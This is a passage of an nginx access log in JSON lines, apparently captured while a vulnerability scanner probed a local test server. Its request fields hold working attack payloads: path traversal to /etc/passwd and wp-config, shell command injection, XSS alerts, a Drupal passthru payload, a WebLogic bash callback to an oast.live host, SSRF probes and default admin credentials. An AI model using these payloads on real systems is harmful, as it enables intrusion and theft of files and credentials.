+{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"$(id>webLib/x)","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /SDK/webLanguage HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /script/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?m=user&c=Users&a=logout&referurl=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/cluster/summary HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ovirt-engine/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /WEB_VMS/LEVEL15/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"x_login=../../../wp-config","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29KD268RWq6H6unPEbRuMCTtg7S/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mifs/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_2/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22bulk\x22,\x0D\x0A \x22source\x22: \x22default\x22,\x0D\x0A \x22args\x22:[\x0D\x0A {\x0D\x0A \x22type\x22: \x22run_sql\x22,\x0D\x0A \x22args\x22: {\x0D\x0A \x22source\x22:\x22default\x22,\x0D\x0A \x22sql\x22:\x22SELECT pg_read_file('/etc/passwd',0,100000);\x22,\x0D\x0A \x22cascade\x22: false,\x0D\x0A \x22read_only\x22: false\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/query HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/hana/xs/formLogin/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx_status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebConsole/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /welcome HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"TRACE / HTTP/1.1","status":"405","body_bytes_sents":"556","req_time":"0.000","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"TRACE", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tests/support/stores/test_grid_filter.php?query=phpinfo(); HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.gitignore HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A /bin/bash\x0D\x0A \x0D\x0A \x0D\x0A -c\x0D\x0A \x0D\x0A \x0D\x0A nslookup ca28fg0smpvbd3qg07h0yxtrfkwkb3xeq.oast.live\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wls-wsat/CoordinatorPortType HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mifs/user/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_3/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"login=AEE&last_page=&username=admin&password=admin&submit=Login&JS_SWITCH=JS_ON","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ZMC_Admin_Login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?u=http://ca28fg0smpvbd3qg07h09ixeppkduw95i.oast.live/&href=http://ca28fg0smpvbd3qg07h0fnipu5rzrbfx3.oast.live/&action=http://ca28fg0smpvbd3qg07h04crqph6m43dcj.oast.live/&host=ca28fg0smpvbd3qg07h08urzi3mx34wyo.oast.live&http_host=ca28fg0smpvbd3qg07h01kkpeaoar1fnf.oast.live&email=root@ca28fg0smpvbd3qg07h06qosmisuh6w5a.oast.live&url=http://ca28fg0smpvbd3qg07h0rz8r7bkr164da.oast.live/&load=http://ca28fg0smpvbd3qg07h0doncc4sqwzo57.oast.live/&preview=http://ca28fg0smpvbd3qg07h0irt6i1h11fm8p.oast.live/&target=http://ca28fg0smpvbd3qg07h0hjgfz89wxiwu1.oast.live/&proxy=http://ca28fg0smpvbd3qg07h0g55jsf8b96n8u.oast.live/&from=http://ca28fg0smpvbd3qg07h0ipoez51yhofaq.oast.live/&src=http://ca28fg0smpvbd3qg07h0mofi1ww3twnz6.oast.live/&ref=http://ca28fg0smpvbd3qg07h0745g76x7d5i8b.oast.live/&referrer=http://ca28fg0smpvbd3qg07h0o3ecpexa8r6xr.oast.live/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"test_data","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /alfresco/api/-default-/public/cmis/versions/1.1/atom HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"__csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22mail[#post_render][]\x22\x0D\x0A\x0D\x0Apassthru\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22mail[#type]\x22\x0D\x0A\x0D\x0Amarkup\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22mail[#markup]\x22\x0D\x0A\x0D\x0Acat /etc/passwd\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22form_id\x22\x0D\x0A\x0D\x0Auser_register_form\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22_drupal_ajax\x22\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"127.0.0.1/user/register", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/.gitignore HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mifs/c/d/android.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslvpn_logon.shtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) 